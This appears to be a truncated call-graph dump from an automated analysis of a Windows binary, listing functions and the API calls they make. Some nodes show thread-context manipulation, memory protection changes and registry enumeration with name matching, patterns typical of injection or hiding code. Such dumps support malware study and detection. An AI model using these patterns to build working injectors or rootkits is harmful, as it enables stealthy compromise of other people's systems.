8009->8005 8011 1845b3bc655 8010->8011 8012 1845b3bb720 _invalid_parameter_noinfo 7 API calls 8011->8012 8012->8014 8013 1845b3bc691 8013->7964 8014->8013 8015 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8014->8015 8015->8013 8017 1845b3bc90f 8016->8017 8018 1845b3bc819 GetCPInfo 8016->8018 8019 1845b3b7a20 _handle_error 4 API calls 8017->8019 8018->8017 8024 1845b3bc82c 8018->8024 8020 1845b3bc9a8 8019->8020 8020->8002 8027 1845b3bf3f4 8024->8027 8026 1845b3bf89c 21 API calls 8026->8017 8028 1845b3babec 19 API calls 8027->8028 8030 1845b3bf436 8028->8030 8029 1845b3bf473 8032 1845b3b7a20 _handle_error 4 API calls 8029->8032 8030->8029 8031 1845b3bae0c 8 API calls 8030->8031 8034 1845b3bf498 8030->8034 8031->8034 8033 1845b3bc8a3 8032->8033 8038 1845b3bf89c 8033->8038 8035 1845b3bf530 8034->8035 8037 1845b3bf516 GetStringTypeW 8034->8037 8035->8029 8036 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8035->8036 8036->8029 8037->8035 8039 1845b3babec 19 API calls 8038->8039 8040 1845b3bf8c1 8039->8040 8043 1845b3bf584 8040->8043 8046 1845b3bf5c6 8043->8046 8044 1845b3b7a20 _handle_error 4 API calls 8045 1845b3bc8d6 8044->8045 8045->8026 8047 1845b3bae0c 8 API calls 8046->8047 8048 1845b3bf643 8046->8048 8050 1845b3bf84f 8046->8050 8047->8048 8049 1845b3bf747 8048->8049 8065 1845b3bd6c0 8048->8065 8049->8050 8052 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8049->8052 8050->8044 8052->8050 8053 1845b3bf6ef 8053->8049 8054 1845b3bf704 8053->8054 8055 1845b3bf756 8053->8055 8054->8049 8058 1845b3bd6c0 4 API calls 8054->8058 8056 1845b3bf770 8055->8056 8057 1845b3bae0c 8 API calls 8055->8057 8056->8049 8059 1845b3bd6c0 4 API calls 8056->8059 8057->8056 8058->8049 8061 1845b3bf7f1 8059->8061 8060 1845b3bf826 8060->8049 8062 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8060->8062 8061->8060 8063 1845b3bf886 8061->8063 8062->8049 8063->8049 8064 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8063->8064 8064->8049 8066 1845b3bd2cc try_get_function 3 API calls 8065->8066 8067 1845b3bd6fe 8066->8067 8068 1845b3bd703 8067->8068 8071 1845b3bd79c 8067->8071 8068->8053 8070 1845b3bd75f LCMapStringW 8070->8068 8072 1845b3bd2cc try_get_function 3 API calls 8071->8072 8073 1845b3bd7ca 8072->8073 8073->8070 7029 1845b3b562d 7030 1845b3b5634 7029->7030 7031 1845b3b569b 7030->7031 7032 1845b3b5717 VirtualProtect 7030->7032 7033 1845b3b5743 GetLastError 7032->7033 7034 1845b3b5751 7032->7034 7033->7034 7035 1845b3bbc30 7036 1845b3bbc56 7035->7036 7045 1845b3bbc6c 7035->7045 7037 1845b3bb840 _set_errno_from_matherr 7 API calls 7036->7037 7039 1845b3bbc5b 7037->7039 7038 1845b3bbcd9 7070 1845b3ba380 7038->7070 7040 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7039->7040 7041 1845b3bbc65 7040->7041 7043 1845b3bbdc1 7046 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7043->7046 7045->7038 7047 1845b3bbccc 7045->7047 7054 1845b3bbe3c 7045->7054 7046->7047 7049 1845b3bbe02 7047->7049 7050 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7047->7050 7048 1845b3bbd4c 7048->7043 7053 1845b3bbe24 7048->7053 7076 1845b3bee10 7048->7076 7051 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7049->7051 7050->7047 7051->7041 7055 1845b3bbe6a 7054->7055 7055->7055 7056 1845b3bb860 _set_errno_from_matherr 7 API calls 7055->7056 7057 1845b3bbeb5 7056->7057 7058 1845b3bee10 7 API calls 7057->7058 7059 1845b3bbeeb 7058->7059 7085 1845b3babec 7059->7085 7061 1845b3bc09f 7093 1845b3bb92c 7061->7093 7064 1845b3bc150 7065 1845b3babec 19 API calls 7064->7065 7066 1845b3bc183 7065->7066 7110 1845b3bbaa4 7066->7110 7069 1845b3bbe3c 20 API calls 7071 1845b3ba398 7070->7071 7075 1845b3ba3d0 7070->7075 7072 1845b3bb860 _set_errno_from_matherr 7 API calls 7071->7072 7071->7075 7073 1845b3ba3c6 7072->7073 7074 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7073->7074 7074->7075 7075->7048 7080 1845b3bee28 7076->7080 7077 1845b3bee2d 7078 1845b3bee43 7077->7078 7079 1845b3bb840 _set_errno_from_matherr 7 API calls 7077->7079 7078->7048 7081 1845b3bee37 7079->7081 7080->7077 7080->7078 7083 1845b3bee72 7080->7083 7082 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7081->7082 7082->7078 7083->7078 7084 1845b3bb840 _set_errno_from_matherr 7 API calls 7083->7084 7084->7081 7086 1845b3bac10 7085->7086 7087 1845b3bac0b 7085->7087 7086->7087 7127 1845b3bb228 7086->7127 7087->7061 7094 1845b3bb977 7093->7094 7095 1845b3bb955 7093->7095 7098 1845b3bb97b 7094->7098 7102 1845b3bb9d0 7094->7102 7096 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7095->7096 7097 1845b3bb963 FindFirstFileExW 7095->7097 7096->7097 7097->7064 7098->7097 7099 1845b3bb98f 7098->7099 7101 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7098->7101 7100 1845b3bae0c 8 API calls 7099->7100 7100->7097 7101->7099 7103 1845b3bba1f 7102->7103 7104 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7102->7104 7107 1845b3bb9f2 try_get_function 7102->7107 7105 1845b3bae0c 8 API calls 7103->7105 7104->7103 7105->7107 7107->7097 7239 1845b3bb7d0 7107->7239 7108 1845b3bb9ff 7109 1845b3bb840 _set_errno_from_matherr 7 API calls 7108->7109 7109->7097 7111 1845b3bbaef 7110->7111 7112 1845b3bbacd 7110->7112 7113 1845b3bbaf4 7111->7113 7118 1845b3bbb48 7111->7118 7114 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7112->7114 7119 1845b3bbadb 7112->7119 7115 1845b3bbb08 7113->7115 7116 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7113->7116 7113->7119 7114->7119 7117 1845b3bae0c 8 API calls 7115->7117 7116->7115 7117->7119 7120 1845b3bbba3 7118->7120 7121 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7118->7121 7125 1845b3bbb73 try_get_function 7118->7125 7119->7069 7122 1845b3bae0c 8 API calls 7120->7122 7121->7120 7122->7125 7123 1845b3bb7d0 7 API calls 7124 1845b3bbb80 7123->7124 7126 1845b3bb840 _set_errno_from_matherr 7 API calls 7124->7126 7125->7119 7125->7123 7126->7119 7128 1845b3bb23d try_get_function 7127->7128 7129 1845b3bd608 _set_errno_from_matherr 4 API calls 7128->7129 7131 1845b3bb257 SetLastError 7128->7131 7130 1845b3bb272 7129->7130 7130->7131 7133 1845b3bb860 _set_errno_from_matherr 7 API calls 7130->7133 7135 1845b3bb2f6 7131->7135 7136 1845b3bac2b 7131->7136 7134 1845b3bb285 7133->7134 7137 1845b3bb2a3 7134->7137 7138 1845b3bb293 7134->7138 7181 1845b3bab94 7135->7181 7173 1845b3be4e4 7136->7173 7142 1845b3bd608 _set_errno_from_matherr 4 API calls 7137->7142 7140 1845b3bd608 _set_errno_from_matherr 4 API calls 7138->7140 7143 1845b3bb29a 7140->7143 7144 1845b3bb2ab 7142->7144 7147 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7143->7147 7145 1845b3bb2af 7144->7145 7146 1845b3bb2c1 7144->7146 7148 1845b3bd608 _set_errno_from_matherr 4 API calls 7145->7148 7149 1845b3baf94 _set_errno_from_matherr 7 API calls 7146->7149 7147->7131 7148->7143 7151 1845b3bb2c9 7149->7151 7152 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7151->7152 7152->7131 7174 1845b3bac4e 7173->7174 7175 1845b3be4f9 7173->7175 7177 1845b3be518 7174->7177 7175->7174 7224 1845b3be98c 7175->7224 7178 1845b3be540 7177->7178 7179 1845b3be52d 7177->7179 7178->7087 7179->7178 7236 1845b3bcc98 7179->7236 7182 1845b3bab9d 7181->7182 7183 1845b3babac 7182->7183 7189 1845b3bdc58 7182->7189 7185 1845b3babb5 IsProcessorFeaturePresent 7183->7185 7187 1845b3babdf 7183->7187 7186 1845b3babc4 7185->7186 7205 1845b3bb50c 7186->7205 7191 1845b3bdc80 7189->7191 7196 1845b3bdca1 7189->7196 7190 1845b3bb3a4 _set_errno_from_matherr 7 API calls 7193 1845b3bdc94 7190->7193 7191->7190 7191->7193 7191->7196 7192 1845b3bdcde 7192->7183 7193->7192 7194 1845b3bdd1e 7193->7194 7193->7196 7195 1845b3bb840 _set_errno_from_matherr 7 API calls 7194->7195 7197 1845b3bdd23 7195->7197 7198 1845b3bdea9 7196->7198 7200 1845b3bb228 19 API calls 7196->7200 7203 1845b3bdde7 7196->7203 7199 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7197->7199 7199->7192 7202 1845b3bddd7 7200->7202 7201 1845b3bb228 19 API calls 7201->7203 7204 1845b3bb228 19 API calls 7202->7204 7203->7201 7204->7203 7206 1845b3bb546 7205->7206 7207 1845b3bb56e RtlCaptureContext RtlLookupFunctionEntry 7206->7207 7208 1845b3bb5de IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7207->7208 7209 1845b3bb5a8 RtlVirtualUnwind 7207->7209 7212 1845b3bb630 7208->7212 7209->7208 7211 1845b3bb64f 7211->7187 7213 1845b3b7a20 7212->7213 7214 1845b3b7a29 7213->7214 7215 1845b3b7a34 7214->7215 7216 1845b3b820c IsProcessorFeaturePresent 7214->7216 7215->7211 7217 1845b3b8224 7216->7217 7220 1845b3b8400 RtlCaptureContext 7217->7220 7219 1845b3b8237 7219->7211 7221 1845b3b841a RtlLookupFunctionEntry 7220->7221 7222 1845b3b8430 RtlVirtualUnwind 7221->7222 7223 1845b3b8469 7221->7223 7222->7221 7222->7223 7223->7219 7225 1845b3bb228 19 API calls 7224->7225 7226 1845b3be99b 7225->7226 7227 1845b3be9e6 7226->7227 7232 1845b3be9fc 7226->7232 7227->7174 7229 1845b3be9d4 7229->7227 7230 1845b3bab94 19 API calls 7229->7230 7231 1845b3be9f9 7230->7231 7233 1845b3bea0e Concurrency::details::SchedulerProxy::DeleteThis 7232->7233 7235 1845b3bea1b 7232->7235 7234 1845b3be6e4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7233->7234 7233->7235 7234->7235 7235->7229 7237 1845b3bb228 19 API calls 7236->7237 7238 1845b3bcca1 7237->7238 7240 1845b3bb3a4 _set_errno_from_matherr 7 API calls 7239->7240 7241 1845b3bb7e1 7240->7241 7242 1845b3bb3a4 _set_errno_from_matherr 7 API calls 7241->7242 7243 1845b3bb7fa 7242->7243 7243->7108 7244 1845b3ba030 7245 1845b3ba04d GetModuleHandleW 7244->7245 7246 1845b3ba097 7244->7246 7245->7246 7252 1845b3ba05a 7245->7252 7258 1845b3b9f28 7246->7258 7248 1845b3ba0d3 7249 1845b3ba0d9 7248->7249 7262 1845b3ba0ec 7248->7262 7252->7246 7254 1845b3ba138 GetModuleHandleExW 7252->7254 7257 1845b3ba15e try_get_function 7254->7257 7255 1845b3ba18d 7255->7246 7256 1845b3ba187 FreeLibrary 7256->7255 7257->7255 7257->7256 7259 1845b3b9f44 7258->7259 7268 1845b3b9f60 7259->7268 7261 1845b3b9f4d 7261->7248 7263 1845b3ba0f9 7262->7263 7264 1845b3ba126 7263->7264 7265 1845b3ba115 GetCurrentProcess TerminateProcess 7263->7265 7266 1845b3ba138 2 API calls 7264->7266 7265->7264 7267 1845b3ba12d ExitProcess 7266->7267 7269 1845b3b9fcf 7268->7269 7270 1845b3b9f76 7268->7270 7269->7261 7270->7269 7272 1845b3ba8ec 7270->7272 7275 1845b3ba798 7272->7275 7274 1845b3ba921 7274->7269 7276 1845b3ba7b4 7275->7276 7279 1845b3ba7d4 7276->7279 7278 1845b3ba7bd 7278->7274 7280 1845b3ba802 7279->7280 7281 1845b3ba7fa 7279->7281 7280->7281 7282 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7280->7282 7281->7278 7282->7281 7283 1845b3baa24 7284 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7283->7284 7285 1845b3baa34 7284->7285 7286 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7285->7286 7287 1845b3baa48 7286->7287 7288 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7287->7288 7289 1845b3baa5c 7288->7289 7290 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7289->7290 7291 1845b3baa70 7290->7291 6739 1845b3b1c28 6744 1845b3b1650 GetProcessHeap HeapAlloc 6739->6744 6741 1845b3b1c3e Sleep SleepEx 6743 1845b3b1c37 6741->6743 6742 1845b3b15c0 StrCmpIW StrCmpW 6742->6743 6743->6741 6743->6742 6788 1845b3b1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6744->6788 6746 1845b3b1678 6789 1845b3b1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6746->6789 6748 1845b3b1689 6790 1845b3b1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6748->6790 6750 1845b3b1692 6791 1845b3b1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6750->6791 6752 1845b3b169b 6753 1845b3b16b6 RegOpenKeyExW 6752->6753 6754 1845b3b18ce 6753->6754 6755 1845b3b16e8 RegOpenKeyExW 6753->6755 6754->6743 6756 1845b3b1711 6755->6756 6757 1845b3b1727 RegOpenKeyExW 6755->6757 6799 1845b3b12c8 RegQueryInfoKeyW 6756->6799 6758 1845b3b1762 RegOpenKeyExW 6757->6758 6759 1845b3b174b 6757->6759 6762 1845b3b179d RegOpenKeyExW 6758->6762 6763 1845b3b1786 6758->6763 6792 1845b3b104c RegQueryInfoKeyW 6759->6792 6767 1845b3b17c1 6762->6767 6768 1845b3b17d8 RegOpenKeyExW 6762->6768 6766 1845b3b12c8 16 API calls 6763->6766 6769 1845b3b1793 RegCloseKey 6766->6769 6770 1845b3b12c8 16 API calls 6767->6770 6771 1845b3b17fc 6768->6771 6772 1845b3b1813 RegOpenKeyExW 6768->6772 6769->6762 6775 1845b3b17ce RegCloseKey 6770->6775 6776 1845b3b12c8 16 API calls 6771->6776 6773 1845b3b184e RegOpenKeyExW 6772->6773 6774 1845b3b1837 6772->6774 6778 1845b3b1872 6773->6778 6779 1845b3b1889 RegOpenKeyExW 6773->6779 6777 1845b3b104c 6 API calls 6774->6777 6775->6768 6780 1845b3b1809 RegCloseKey 6776->6780 6781 1845b3b1844 RegCloseKey 6777->6781 6782 1845b3b104c 6 API calls 6778->6782 6783 1845b3b18ad 6779->6783 6784 1845b3b18c4 RegCloseKey 6779->6784 6780->6772 6781->6773 6785 1845b3b187f RegCloseKey 6782->6785 6786 1845b3b104c 6 API calls 6783->6786 6784->6754 6785->6779 6787 1845b3b18ba RegCloseKey 6786->6787 6787->6784 6788->6746 6789->6748 6790->6750 6791->6752 6793 1845b3b11b5 RegCloseKey 6792->6793 6794 1845b3b10b9 6792->6794 6793->6758 6794->6793 6795 1845b3b10c7 RegEnumValueW 6794->6795 6797 1845b3b111c 6795->6797 6796 1845b3b1149 GetProcessHeap HeapAlloc 6796->6797 6797->6793 6797->6795 6797->6796 6798 1845b3b117f GetProcessHeap HeapFree 6797->6798 6798->6797 6800 1845b3b1334 GetProcessHeap HeapAlloc 6799->6800 6801 1845b3b1499 RegCloseKey 6799->6801 6802 1845b3b135d RegEnumValueW 6800->6802 6803 1845b3b1485 GetProcessHeap HeapFree 6800->6803 6801->6757 6807 1845b3b13af 6802->6807 6803->6801 6805 1845b3b142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 6805->6807 6806 1845b3b13dd GetProcessHeap HeapAlloc 6806->6807 6807->6802 6807->6803 6807->6805 6807->6806 6808 1845b3b1413 GetProcessHeap HeapFree 6807->6808 6809 1845b3b1554 6807->6809 6808->6805 6810 1845b3b156e 6809->6810 6813 1845b3b15a4 6809->6813 6811 1845b3b158d StrCmpW 6810->6811 6812 1845b3b1585 StrCmpIW 6810->6812 6810->6813 6811->6810 6812->6810 6813->6807 7292 1845b3bd820 7293 1845b3bd859 7292->7293 7294 1845b3bd82a 7292->7294 7294->7293 7295 1845b3bd83f FreeLibrary 7294->7295 7295->7294 7507 1845b3bfc9b 7508 1845b3bfcc0 7507->7508 7509 1845b3bfd32 7507->7509 7508->7509 7514 1845b3bfcf3 7508->7514 7510 1845b3bb840 _set_errno_from_matherr 7 API calls 7509->7510 7511 1845b3bfd37 7510->7511 7516 1845b3bb820 7511->7516 7513 1845b3bfd24 7514->7513 7515 1845b3bfd1c SetStdHandle 7514->7515 7515->7513 7517 1845b3bb3a4 _set_errno_from_matherr 7 API calls 7516->7517 7518 1845b3bb829 7517->7518 7518->7513 7519 1845b3b8094 7520 1845b3b93ec __std_exception_copy 7 API calls 7519->7520 7521 1845b3b80bd 7520->7521 8074 1845b3b5314 8075 1845b3b531a 8074->8075 8076 1845b3b7950 2 API calls 8075->8076 8077 1845b3b535d 8076->8077 8079 1845b3b537e 8077->8079 8086 1845b3b3da0 8077->8086 8080 1845b3b5417 8080->8079 8083 1845b3b559d 8080->8083 8090 1845b3b7520 8080->8090 8082 1845b3b569b 8083->8082 8084 1845b3b5717 VirtualProtect 8083->8084 8084->8079 8085 1845b3b5743 GetLastError 8084->8085 8085->8079 8087 1845b3b3dbd 8086->8087 8089 1845b3b3e2c 8087->8089 8096 1845b3b4010 8087->8096 8089->8080 8091 1845b3b7567 8090->8091 8121 1845b3b72f0 8091->8121 8094 1845b3b7a20 _handle_error 4 API calls 8095 1845b3b7591 8094->8095 8095->8080 8097 1845b3b4057 8096->8097 8098 1845b3b4034 8096->8098 8099 1845b3b408d 8097->8099 8116 1845b3b3bf0 8097->8116 8098->8097 8110 1845b3b3ac0 8098->8110 8102 1845b3b3bf0 2 API calls 8099->8102 8107 1845b3b40bd 8099->8107 8102->8107 8103 1845b3b40f3 8104 1845b3b410f 8103->8104 8105 1845b3b3ac0 3 API calls 8103->8105 8106 1845b3b412b 8104->8106 8109 1845b3b3bf0 2 API calls 8104->8109 8105->8104 8106->8089 8107->8103 8108 1845b3b3ac0 3 API calls 8107->8108 8108->8103 8109->8106 8111 1845b3b3ae1 8110->8111 8112 1845b3b3b36 VirtualQuery 8111->8112 8113 1845b3b3b50 8111->8113 8114 1845b3b3b6a VirtualAlloc 8111->8114 8112->8111 8112->8113 8113->8097 8114->8113 8115 1845b3b3b9b GetLastError 8114->8115 8115->8111 8117 1845b3b3c08 8116->8117 8118 1845b3b3c5d VirtualQuery 8117->8118 8119 1845b3b3c77 8117->8119 8120 1845b3b3cc2 GetLastError 8117->8120 8118->8117 8118->8119 8119->8099 8120->8117 8122 1845b3b730b 8121->8122 8123 1845b3b732f 8122->8123 8124 1845b3b7321 SetLastError 8122->8124 8123->8094 8124->8123 7296 1845b3ba01b 7299 1845b3bab00 7296->7299 7300 1845b3bb228 19 API calls 7299->7300 7301 1845b3bab09 7300->7301 7302 1845b3bab94 19 API calls 7301->7302 7303 1845b3bab1f 7302->7303 8353 1845b3b3b99 8356 1845b3b3ae6 8353->8356 8354 1845b3b3b50 8355 1845b3b3b36 VirtualQuery 8355->8354 8355->8356 8356->8354 8356->8355 8357 1845b3b3b6a VirtualAlloc 8356->8357 8357->8354 8358 1845b3b3b9b GetLastError 8357->8358 8358->8356 8359 1845b3b5999 8360 1845b3b59a0 VirtualProtect 8359->8360 8361 1845b3b59c9 GetLastError 8360->8361 8362 1845b3b58b0 8360->8362 8361->8362 8363 1845b3ba98c 8366 1845b3ba758 8363->8366 8373 1845b3ba720 8366->8373 8371 1845b3ba6dc 7 API calls 8372 1845b3ba780 8371->8372 8374 1845b3ba730 8373->8374 8375 1845b3ba735 8373->8375 8376 1845b3ba6dc 7 API calls 8374->8376 8377 1845b3ba73c 8375->8377 8376->8375 8378 1845b3ba74c 8377->8378 8379 1845b3ba751 8377->8379 8380 1845b3ba6dc 7 API calls 8378->8380 8379->8371 8380->8379 8125 1845b3b7910 8126 1845b3b792c 8125->8126 8127 1845b3b7931 8125->8127 8129 1845b3b7a40 8126->8129 8130 1845b3b7a63 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8129->8130 8131 1845b3b7ad7 8129->8131 8130->8131 8131->8127 8381 1845b3c298f 8382 1845b3c29a7 8381->8382 8388 1845b3c2a12 8381->8388 8382->8388 8389 1845b3b963c 8382->8389 8385 1845b3b963c 24 API calls 8386 1845b3c2a09 8385->8386 8387 1845b3bab00 19 API calls 8386->8387 8387->8388 8390 1845b3b9658 5 API calls 8389->8390 8391 1845b3b9645 8390->8391 8392 1845b3b964a 8391->8392 8393 1845b3bab94 19 API calls 8391->8393 8392->8385 8394 1845b3b9654 8393->8394 7304 1845b3b8207 7305 1845b3b820c IsProcessorFeaturePresent 7304->7305 7306 1845b3b8224 7305->7306 7307 1845b3b8400 capture_previous_context 3 API calls 7306->7307 7308 1845b3b8237 7307->7308 7522 1845b3bda88 7523 1845b3bda98 7522->7523 7530 1845b3bfbac 7523->7530 7525 1845b3bdaa1 7526 1845b3bdaaf 7525->7526 7538 1845b3bd88c GetStartupInfoW 7525->7538 7531 1845b3bfbcb 7530->7531 7537 1845b3bfbf4 7530->7537 7532 1845b3bb840 _set_errno_from_matherr 7 API calls 7531->7532 7533 1845b3bfbd0 7532->7533 7534 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7533->7534 7535 1845b3bfbdc 7534->7535 7535->7525 7537->7535 7549 1845b3bfab4 7537->7549 7539 1845b3bd8c1 7538->7539 7540 1845b3bd95b 7538->7540 7539->7540 7541 1845b3bfbac 8 API calls 7539->7541 7544 1845b3bd97c 7540->7544 7542 1845b3bd8ea 7541->7542 7542->7540 7543 1845b3bd914 GetFileType 7542->7543 7543->7542 7546 1845b3bd99a 7544->7546 7545 1845b3bda6d 7545->7526 7546->7545 7547 1845b3bd9f5 GetStdHandle 7546->7547 7547->7546 7548 1845b3bda08 GetFileType 7547->7548 7548->7546 7550 1845b3bb860 _set_errno_from_matherr 7 API calls 7549->7550 7551 1845b3bfad5 7550->7551 7552 1845b3bfb37 7551->7552 7556 1845b3bd65c 7551->7556 7553 1845b3bb8d8 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7552->7553 7554 1845b3bfb41 7553->7554 7554->7537 7557 1845b3bd2cc try_get_function 3 API calls 7556->7557 7558 1845b3bd692 7557->7558 7559 1845b3bd6a7 InitializeCriticalSectionAndSpinCount 7558->7559 7560 1845b3bd69c 7558->7560 7559->7560 7560->7551 8395 1845b3c158b 8396 1845b3c1830 8395->8396 8399 1845b3c15cb 8395->8399 8401 1845b3c2110 _log10_special 12 API calls 8396->8401 8402 1845b3c1826 8396->8402 8397 1845b3c1812 8403 1845b3c2110 8397->8403 8398 1845b3c15ff 8399->8396 8399->8397 8399->8398 8401->8402 8406 1845b3c2130 8403->8406 8407 1845b3c214a 8406->8407 8408 1845b3c212b 8407->8408 8410 1845b3c1f74 8407->8410 8408->8402 8411 1845b3c1fb4 _handle_error 8410->8411 8414 1845b3c2020 _handle_error 8411->8414 8421 1845b3c2230 8411->8421 8413 1845b3c205d 8428 1845b3c2568 8413->8428 8414->8413 8415 1845b3c202d 8414->8415 8424 1845b3c1e50 8415->8424 8418 1845b3c205b _handle_error 8419 1845b3b7a20 _handle_error 4 API calls 8418->8419 8420 1845b3c2085 8419->8420 8420->8408 8434 1845b3c2258 8421->8434 8425 1845b3c1e94 _handle_error 8424->8425 8426 1845b3c1ea9 8425->8426 8427 1845b3c2568 _set_errno_from_matherr 7 API calls 8425->8427 8426->8418 8427->8426 8429 1845b3c2571 8428->8429 8430 1845b3c2586 8428->8430 8431 1845b3c257e 8429->8431 8433 1845b3bb840 _set_errno_from_matherr 7 API calls 8429->8433 8432 1845b3bb840 _set_errno_from_matherr 7 API calls 8430->8432 8431->8418 8432->8431 8433->8431 8435 1845b3c2297 _raise_exc _clrfp 8434->8435 8436 1845b3c24ac RaiseException 8435->8436 8437 1845b3c2252 8436->8437 8437->8414 8132 1845b3c1b80 8133 1845b3c1b91 CloseHandle 8132->8133 8134 1845b3c1b97 8132->8134 8133->8134 7309 1845b3b2a7c 7310 1845b3b2ac1 7309->7310 7311 1845b3b2b20 7310->7311 7313 1845b3b3930 7310->7313 7314 1845b3b393d StrCmpNIW 7313->7314 7315 1845b3b3952 7313->7315 7314->7315 7315->7310 7561 1845b3b92fc 7568 1845b3b9784 7561->7568 7564 1845b3b9309 7566 1845b3b9312 7566->7564 7578 1845b3b97cc 7566->7578 7569 1845b3b978c 7568->7569 7571 1845b3b97bd 7569->7571 7572 1845b3b9305 7569->7572 7582 1845b3b9a80 7569->7582 7573 1845b3b97cc __vcrt_uninitialize_locks DeleteCriticalSection 7571->7573 7572->7564 7574 1845b3b9718 7572->7574 7573->7572 7575 1845b3b9728 7574->7575 7577 1845b3b9741 __vcrt_uninitialize_ptd 7575->7577 7594 1845b3b9a2c 7575->7594 7577->7566 7579 1845b3b97f7 7578->7579 7580 1845b3b97fb 7579->7580 7581 1845b3b97da DeleteCriticalSection 7579->7581 7580->7564 7581->7579 7587 1845b3b9804 7582->7587 7584 1845b3b9ab6 7585 1845b3b9acb InitializeCriticalSectionAndSpinCount 7584->7585 7586 1845b3b9ac0 7584->7586 7585->7586 7586->7569 7589 1845b3b990d try_get_function 7587->7589 7592 1845b3b9848 try_get_function 7587->7592 7588 1845b3b9876 LoadLibraryExW 7590 1845b3b98ed 7588->7590 7588->7592 7589->7584 7590->7589 7591 1845b3b9904 FreeLibrary 7590->7591 7591->7589 7592->7588 7592->7589 7593 1845b3b98b9 LoadLibraryExW 7592->7593 7593->7590 7593->7592 7595 1845b3b9804 __vcrt_InitializeCriticalSectionEx 3 API calls 7594->7595 7596 1845b3b9a5a 7595->7596 7597 1845b3b9a6c TlsSetValue 7596->7597 7598 1845b3b9a64 7596->7598 7597->7598 7598->7577 8438 1845b3b7bfc 8439 1845b3b7c20 __scrt_release_startup_lock 8438->8439 8440 1845b3b9d99 8439->8440 8441 1845b3bb3a4 _set_errno_from_matherr 7 API calls 8439->8441 8442 1845b3b9dc2 8441->8442 8443 1845b3bcffc GetCommandLineA GetCommandLineW 8135 1845b3b5d83 8136 1845b3b5d90 8135->8136 8137 1845b3b5d9c GetThreadContext 8136->8137 8140 1845b3b5efa 8136->8140 8138 1845b3b5dc2 8137->8138 8137->8140 8138->8140 8143 1845b3b5de9 8138->8143 8139 1845b3b5f21 VirtualProtect FlushInstructionCache 8139->8140 8140->8139 8142 1845b3b5fde 8140->8142 8141 1845b3b5ffe 8144 1845b3b4ed0 3 API calls 8141->8144 8142->8141 8146 1845b3b44c0 VirtualFree 8142->8146 8145 1845b3b5e6d 8143->8145 8147 1845b3b5e46 SetThreadContext 8143->8147 8150 1845b3b6003 8144->8150 8146->8141 8147->8145 8148 1845b3b6057 8151 1845b3b7a20 _handle_error 4 API calls 8148->8151 8149 1845b3b6017 ResumeThread 8149->8150 8150->8148 8150->8149 8152 1845b3b609f 8151->8152 7316 1845b3bea70 7317 1845b3bea9d 7316->7317 7318 1845b3bb840 _set_errno_from_matherr 7 API calls 7317->7318 7323 1845b3beab2 7317->7323 7319 1845b3beaa7 7318->7319 7320 1845b3bb720 _invalid_parameter_noinfo 7 API calls 7319->7320 7320->7323 7321 1845b3b7a20 _handle_error 4 API calls 7322 1845b3bedff 7321->7322 7323->7321 8444 1845b3be5f0 8447 1845b3be574 8444->8447 8446 1845b3be619 8449 1845b3be592 8447->8449 8448 1845b3be5cb 8448->8446 8449->8448 8450 1845b3be9fc 7 API calls 8449->8450 8450->8449 8153 1845b3b596c 8154 1845b3b5973 8153->8154 8155 1845b3b59a0 VirtualProtect 8154->8155 8156 1845b3b58b0 8154->8156 8155->8156 8157 1845b3b59c9 GetLastError 8155->8157 8157->8156 7324 1845b3bb470 7325 1845b3bb480 7324->7325 7326 1845b3bb48b __vcrt_uninitialize_ptd 7325->7326 7327 1845b3bb3a4 _set_errno_from_matherr 7 API calls 7325->7327 7327->7326 7606 1845b3b26f0 7607 1845b3b276f 7606->7607 7608 1845b3b27d1 GetFileType 7607->7608 7617 1845b3b2961 7607->7617 7609 1845b3b27df StrCpyW 7608->7609 7610 1845b3b27f5 7608->7610 7611 1845b3b2804 7609->7611 7622 1845b3b1ab8 GetFinalPathNameByHandleW 7610->7622 7615 1845b3b280e 7611->7615 7618 1845b3b28b3 7611->7618 7613 1845b3b3930 StrCmpNIW 7613->7615 7614 1845b3b3930 StrCmpNIW 7614->7618 7615->7613 7615->7617 7627 1845b3b3200 StrCmpIW 7615->7627 7631 1845b3b1e4c 7615->7631 7618->7614 7618->7617 7620 1845b3b3200 4 API calls 7618->7620 7621 1845b3b1e4c 2 API calls 7618->7621 7620->7618 7621->7618 7623 